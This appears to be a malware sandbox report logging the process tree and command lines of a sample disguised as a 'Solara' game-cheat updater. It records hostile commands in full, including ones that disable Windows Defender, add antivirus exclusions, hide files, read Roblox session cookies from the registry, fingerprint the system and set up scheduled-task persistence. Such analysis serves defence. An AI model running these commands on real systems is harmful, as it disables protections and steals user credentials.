PID 768 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2704 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 2704 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 2704 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2496 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2496 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2496 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2496 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2496 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2496 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 752 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 752 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2704 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4640 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4640 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 752 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 752 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2704 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 1336 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 3948 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 3948 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3948 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3948 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1044 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\hostNet\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5c30zw5y\5c30zw5y.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1AC.tmp" "c:\Users\Admin\AppData\Roaming\CSCEBF7F73354034CD7AD6BE25A5A5285C1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwvpx0np\vwvpx0np.cmdline"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB239.tmp" "c:\Windows\System32\CSC94C34EF13D4D4F8881CC8A1FBB80DA17.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Users\Default User\wscript.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Solara_UpdaterS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Solara_Updater" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Solara_UpdaterS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 5 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EEJCG9hD9w.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet\bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

